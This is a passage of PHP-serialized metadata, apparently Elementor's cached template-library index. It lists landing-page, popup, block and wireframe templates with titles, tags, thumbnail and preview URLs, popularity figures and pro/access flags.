Pages\",\"Restaurant\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:160;a:16:{s:4:\"tmpl\";i:1400;s:2:\"id\";i:23751;s:5:\"title\";s:33:\"Baby Sleep Webinar &#8211; Events\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/63-Baby-Sleep-Webinar.jpg\";s:12:\"tmpl_created\";i:1649676065;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/baby-sleep-webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:227:\"[\"Baby\",\"Booking\",\"Business\",\"Children\",\"Course Online\",\"Education\",\"Events\",\"Health\",\"Landing Pages\",\"Life Coach\",\"Lifestyle\",\"Online Event\",\"Online Service\",\"Parenting\",\"Professional\",\"Remote\",\"Services\",\"Training\",\"Webinar\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:161;a:16:{s:4:\"tmpl\";i:1401;s:2:\"id\";i:23776;s:5:\"title\";s:34:\"Ski Hotel Promotion &#8211; Travel\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2022/04/64-Ski-Hotel-Promotion.jpg\";s:12:\"tmpl_created\";i:1649691720;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/ski-hotel-promotion-travel/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:6:\"Travel\";s:4:\"tags\";s:118:\"[\"Accommodation\",\"Booking\",\"Discount. Landing Pages\",\"Lifestyle\",\"Luxury\",\"Services\",\"Spa\",\"Travel\",\"Trip\",\"Vacation\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:162;a:16:{s:4:\"tmpl\";i:1402;s:2:\"id\";i:23804;s:5:\"title\";s:30:\"Cake Delivery &#8211; Business\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2022/04/67-Cake-Delivery.jpg\";s:12:\"tmpl_created\";i:1649692909;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/cake-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:101:\"[\"Bakery\",\"Business\",\"Cake\",\"Cooking\",\"Delivery\",\"Discount\",\"Food\",\"Landing Pages\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:163;a:16:{s:4:\"tmpl\";i:1403;s:2:\"id\";i:23832;s:5:\"title\";s:32:\"Furniture Store &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/87-Furniture-Store.jpg\";s:12:\"tmpl_created\";i:1649694812;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/furniture-store-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:232:\"[\"Architecture\",\"Art\",\"Business\",\"Construction\",\"Coupon\",\"Creative\",\"Decor\",\"Designer\",\"Discount\",\"Fashion\",\"Furniture Design\",\"Home\",\"House\",\"Interior Design\",\"Landing Pages\",\"Lifestyle\",\"Products\",\"Professional\",\"Services\",\"Shop\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:164;a:16:{s:4:\"tmpl\";i:1404;s:2:\"id\";i:23746;s:5:\"title\";s:22:\"Nails &#8211; Business\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2022/04/62-Nails-1.jpg\";s:12:\"tmpl_created\";i:1649704635;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/nails-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:173:\"[\"Art\",\"Beauty\",\"Business\",\"Colorful\",\"Cosmetics\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Girly\",\"Landing Pages\",\"Lifestyle\",\"Manicure\",\"Modern\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:165;a:16:{s:4:\"tmpl\";i:1405;s:2:\"id\";i:23846;s:5:\"title\";s:29:\"Music Festival &#8211; Events\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2022/04/88-Music-Festival.jpg\";s:12:\"tmpl_created\";i:1649707763;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/music-festival-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:128:\"[\"Author\",\"Booking\",\"Business\",\"Creative\",\"Discount\",\"Events\",\"Landing Pages\",\"Music\",\"Online\",\"Online Event\",\"Party\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:166;a:16:{s:4:\"tmpl\";i:1406;s:2:\"id\";i:23872;s:5:\"title\";s:40:\"Fashion Styling Course &#8211; Education\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/89-Fashion-Styling-Course.jpg\";s:12:\"tmpl_created\";i:1649708569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/fashion-styling-course-education/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"Education\";s:4:\"tags\";s:173:\"[\"Aesthetic\",\"Art\",\"Beauty\",\"Business\",\"Course Online\",\"Creative\",\"Discount\",\"Education\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Online\",\"Online Service\",\"Stylist\",\"Virtual\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:167;a:16:{s:4:\"tmpl\";i:1407;s:2:\"id\";i:23897;s:5:\"title\";s:33:\"Bags Online Shop &#8211; Business\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2022/04/90-Bags-Online-Shop.jpg\";s:12:\"tmpl_created\";i:1649709513;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/bags-online-shop-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:170:\"[\"Art\",\"Bag\",\"Business\",\"Creative\",\"Design\",\"Discount\",\"Fashion\",\"Landing Pages\",\"Lifestyle\",\"Luxury\",\"Modern\",\"Online\",\"Online Shop\",\"Products\",\"Sales\",\"Shop\",\"Stylist\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:168;a:16:{s:4:\"tmpl\";i:1408;s:2:\"id\";i:23932;s:5:\"title\";s:32:\"Cooking Academy &#8211; Business\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2022/04/91-Cooking-Academy.jpg\";s:12:\"tmpl_created\";i:1649710216;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/cooking-academy-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:145:\"[\"Academy\",\"Booking\",\"Business\",\"Chef\",\"Cooking\",\"Education\",\"Food\",\"Free Trial\",\"Landing Pages\",\"Professional\",\"School\",\"Teacher\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:169;a:16:{s:4:\"tmpl\";i:1409;s:2:\"id\";i:23970;s:5:\"title\";s:45:\"Ophthalmology Medical Clinic &#8211; Business\";s:9:\"thumbnail\";s:92:\"https://library.elementor.com/wp-content/uploads/2022/04/92-Ophthalmology-Medical-Clinic.jpg\";s:12:\"tmpl_created\";i:1649711096;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/lp/ophthalmology-medical-clinic-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:165:\"[\"About\",\"Business\",\"Care\",\"Consulting\",\"Eye\",\"Free Trial\",\"Glasses\",\"Health\",\"Landing Pages\",\"Lifestyle\",\"Medical\",\"Modern\",\"Optometrist\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:170;a:16:{s:4:\"tmpl\";i:1425;s:2:\"id\";i:24331;s:5:\"title\";s:24:\"Wireframe &#8211; Home 1\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Home-1.jpg\";s:12:\"tmpl_created\";i:1653988363;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/wireframe-home-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:102:\"[\"Business\",\"Contact\",\"Features\",\"Footer\",\"Header\",\"Homepage\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:171;a:16:{s:4:\"tmpl\";i:674;s:2:\"id\";i:8505;s:5:\"title\";s:11:\"404 page 01\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/001.jpg\";s:12:\"tmpl_created\";i:1526415501;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-01/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:533;s:11:\"trend_index\";i:222;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:172;a:16:{s:4:\"tmpl\";i:1218;s:2:\"id\";i:20792;s:5:\"title\";s:26:\"Luxury Car &#8211; Product\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/11/250x280-1.jpg\";s:12:\"tmpl_created\";i:1636903770;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/lp/luxury-car-product/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:7:\"Product\";s:4:\"tags\";s:54:\"[\"car\",\"Ecommerce\",\"Landing Pages\",\"Luxury\",\"Product\"]\";s:10:\"menu_order\";i:1;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:173;a:16:{s:4:\"tmpl\";i:1428;s:2:\"id\";i:24398;s:5:\"title\";s:25:\"Wireframe &#8211; About 1\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-About-1.jpg\";s:12:\"tmpl_created\";i:1653988534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/wireframe-about-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:83:\"[\"About\",\"Business\",\"Contact\",\"Features\",\"Footer\",\"Professional\",\"Services\",\"Team\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:174;a:16:{s:4:\"tmpl\";i:675;s:2:\"id\";i:8511;s:5:\"title\";s:11:\"404 page 02\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/002.jpg\";s:12:\"tmpl_created\";i:1526415528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-02/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:347;s:11:\"trend_index\";i:155;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:175;a:16:{s:4:\"tmpl\";i:1204;s:2:\"id\";i:20208;s:5:\"title\";s:49:\"Alternative Medicine Acupuncture &#8211; Business\";s:9:\"thumbnail\";s:112:\"https://library.elementor.com/wp-content/uploads/2021/10/Alternative-Medicine-Acupuncture-Business-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633880557;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/lp/alternative-medicine-acupuncture-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:47:\"[\"Health\",\"Landing Pages\",\"Medical\",\"Services\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:176;a:16:{s:4:\"tmpl\";i:991;s:2:\"id\";i:13413;s:5:\"title\";s:33:\"Classic | Contact | Online Course\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp-Help.jpg\";s:12:\"tmpl_created\";i:1587474761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/classic-contact-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:2;s:16:\"popularity_index\";i:530;s:11:\"trend_index\";i:369;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:177;a:16:{s:4:\"tmpl\";i:1053;s:2:\"id\";i:15272;s:5:\"title\";s:32:\"Classic | Contact | Psychologist\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/09/PopUp.png\";s:12:\"tmpl_created\";i:1600170487;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/classic-contact-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:578;s:11:\"trend_index\";i:312;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:178;a:16:{s:4:\"tmpl\";i:1433;s:2:\"id\";i:24477;s:5:\"title\";s:27:\"Wireframe &#8211; Gallery 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Gallery-2.jpg\";s:12:\"tmpl_created\";i:1653988835;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-gallery-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:82:\"[\"Business\",\"Contact\",\"Design\",\"Footer\",\"Gallery\",\"Header\",\"Portfolio\",\"Services\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:179;a:16:{s:4:\"tmpl\";i:672;s:2:\"id\";i:8512;s:5:\"title\";s:11:\"404 page 03\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/003.jpg\";s:12:\"tmpl_created\";i:1526415449;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-03/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:450;s:11:\"trend_index\";i:375;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:180;a:16:{s:4:\"tmpl\";i:1205;s:2:\"id\";i:20233;s:5:\"title\";s:32:\"Art Magazine &#8211; Coming Soon\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Art-Magazine-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633881371;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/art-magazine-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:48:\"[\"Art\",\"Coming Soon\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:3;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:181;a:16:{s:4:\"tmpl\";i:671;s:2:\"id\";i:8513;s:5:\"title\";s:11:\"404 page 04\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/004.jpg\";s:12:\"tmpl_created\";i:1526415417;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-04/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:420;s:11:\"trend_index\";i:176;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:182;a:16:{s:4:\"tmpl\";i:1214;s:2:\"id\";i:20539;s:5:\"title\";s:31:\"Design Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:94:\"https://library.elementor.com/wp-content/uploads/2021/10/Design-Blog-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022706;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/design-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:47:\"[\"Blog\",\"Coming Soon\",\"Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:183;a:16:{s:4:\"tmpl\";i:1224;s:2:\"id\";i:21013;s:5:\"title\";s:24:\"Restaurant &#8211; About\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/12/7-About-Restaurant.jpg\";s:12:\"tmpl_created\";i:1638795588;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/restaurant-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:36:\"[\"About\",\"Chef\",\"Food\",\"Restaurant\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:184;a:16:{s:4:\"tmpl\";i:992;s:2:\"id\";i:13402;s:5:\"title\";s:29:\"Classic | CTA | Online Course\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2020/04/Popup-Course-Completed.jpg\";s:12:\"tmpl_created\";i:1587474772;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/popups/classic-cta-online-course/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:29:\"[\"Course Online\",\"Education\"]\";s:10:\"menu_order\";i:4;s:16:\"popularity_index\";i:619;s:11:\"trend_index\";i:582;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:185;a:16:{s:4:\"tmpl\";i:676;s:2:\"id\";i:8514;s:5:\"title\";s:11:\"404 Page 05\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/005.jpg\";s:12:\"tmpl_created\";i:1526415558;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-05/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:419;s:11:\"trend_index\";i:220;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:186;a:16:{s:4:\"tmpl\";i:1206;s:2:\"id\";i:20254;s:5:\"title\";s:41:\"Digital Marketing Agency &#8211; Business\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Digital-Marketing-Agency-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633882427;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/lp/digital-marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:65:\"[\"Agency\",\"Business\",\"Digital Agency\",\"Landing Pages\",\"Services\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:187;a:16:{s:4:\"tmpl\";i:1235;s:2:\"id\";i:21281;s:5:\"title\";s:25:\"Law Firm &#8211; Services\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/16-Services-Law-firm.jpg\";s:12:\"tmpl_created\";i:1638819128;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/law-firm-services-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Consulting\",\"Law\",\"Law Firm\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:188;a:16:{s:4:\"tmpl\";i:1017;s:2:\"id\";i:14111;s:5:\"title\";s:36:\"Classic | Japanese restaurant | Sale\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1592300400;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:138:\"https://library.elementor.com/popups/classic-japanese-restaurant-sale/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:7:\"classic\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:5;s:16:\"popularity_index\";i:717;s:11:\"trend_index\";i:697;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:189;a:16:{s:4:\"tmpl\";i:668;s:2:\"id\";i:8523;s:5:\"title\";s:11:\"404 page 06\";s:9:\"thumbnail\";s:64:\"https://library.elementor.com/wp-content/uploads/2018/05/006.jpg\";s:12:\"tmpl_created\";i:1526415291;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/blocks/404-page-06/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:8:\"404 page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:298;s:11:\"trend_index\";i:268;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:190;a:16:{s:4:\"tmpl\";i:1213;s:2:\"id\";i:20509;s:5:\"title\";s:40:\"Dogs Adoption &#8211; Social Involvement\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/10/Dog-Adoption-250x280-1.jpg\";s:12:\"tmpl_created\";i:1634022353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/dogs-adoption-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:49:\"[\"Adoption\",\"Involvement\",\"Landing Pages\",\"Pets\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:191;a:16:{s:4:\"tmpl\";i:1233;s:2:\"id\";i:21205;s:5:\"title\";s:29:\"Photographer &#8211; Projects\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/12/25-Projects-Photographer.jpg\";s:12:\"tmpl_created\";i:1638818372;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/photographer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:43:\"[\"Black and white\",\"Photography\",\"Project\"]\";s:10:\"menu_order\";i:6;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:192;a:16:{s:4:\"tmpl\";i:993;s:2:\"id\";i:13422;s:5:\"title\";s:30:\"Classic | Menu | Online 